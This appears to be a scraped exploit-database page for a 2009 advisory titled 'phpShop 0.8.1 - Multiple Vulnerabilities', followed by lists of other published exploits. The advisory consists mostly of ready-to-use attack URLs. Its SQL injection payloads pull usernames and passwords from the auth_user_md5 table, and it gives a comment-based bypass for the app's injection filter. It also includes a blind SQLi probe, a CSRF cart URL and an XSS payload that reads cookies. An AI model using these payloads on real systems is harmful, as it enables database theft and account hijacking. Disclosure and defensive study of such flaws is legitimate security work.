Menu

Search for hundreds of thousands of exploits

"phpShop 0.8.1 - Multiple Vulnerabilities"

Author

Exploit author

"Andrea Fabrizi"

Platform

Exploit platform

php

Release date

Exploit published date

2009-12-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
**************************************************************
Vendor: http://www.phpshop.org/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
**************************************************************


### SQL INJECTION
http://server/phpshop-0.8.1/?page=admin/function_list&module_id=111111' union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- aaa
http://server/phpshop-0.8.1/?page=shop/flypage&product_id=1011'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5 -- aaa
http://server/phpshop-0.8.1/?page=vendor/vendor_form&vendor_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=admin/module_form&module_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=admin/user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
http://server/phpshop-0.8.1/?page=vendor/vendor_category_form&vendor_category_id=6' and '1'='1
http://server/phpshop-0.8.1/?page=store/user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
http://server/phpshop-0.8.1/?page=store/payment_method_form&payment_method_id=1' and '1'='1
http://server/phpshop-0.8.1/?page=tax/tax_form&tax_rate_id=2' and '1'='1
...and many others...

The SQL Injection security check can be bypassed replacing spaces with comments (/**/)

### BLIND SQL INJECTION
http://server/phpshop-0.8.1/?page=shop/browse&category=aaa' and 1=1 -- aaa


### CSRF
http://server/phpshop-0.8.1/?page=shop/cart&func=cartAdd&product_id=321&
...and many others...


### XSS
http://server/phpshop-0.8.1/?page=order/order_print&order_id=1"><script>alert(document.cookie);</script>
...and many others...
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2013-12-24 "Synology DSM 4.3-3810 - Directory Traversal" webapps cgi "Andrea Fabrizi"
2013-09-12 "Synology DiskStation Manager (DSM) 4.3-3776 - Multiple Vulnerabilities" webapps linux "Andrea Fabrizi"
2013-08-21 "Samsung DVR Firmware 1.10 - Authentication Bypass" webapps hardware "Andrea Fabrizi"
2013-01-31 "Buffalo TeraStation TS-Series - Multiple Vulnerabilities" webapps hardware "Andrea Fabrizi"
2012-10-16 "Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities" webapps hardware "Andrea Fabrizi"
2012-09-05 "QNAP Turbo NAS TS-1279U-RP - Multiple Path Injections" webapps hardware "Andrea Fabrizi"
2011-12-18 "novell sentinel log manager 1.2.0.1 - Directory Traversal" webapps multiple "Andrea Fabrizi"
2011-01-31 "Joomla! Component com_virtuemart 1.1.6 - SQL Injection" webapps php "Andrea Fabrizi"
2009-12-05 "phpShop 0.8.1 - Multiple Vulnerabilities" webapps php "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 3.4.7 - Sound Tag Onload Attribute Cross-Site Scripting" webapps php "Andrea Fabrizi"
2009-10-15 "Snitz Forums 2000 3.4.7 - 'pop_send_to_friend.asp?url' Cross-Site Scripting" webapps php "Andrea Fabrizi"
2009-10-14 "Everfocus 1.4 - EDSR Remote Authentication Bypass" webapps multiple "Andrea Fabrizi"
2009-10-09 "Docebo 3.6.0.3 - Multiple SQL Injections" webapps php "Andrea Fabrizi" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected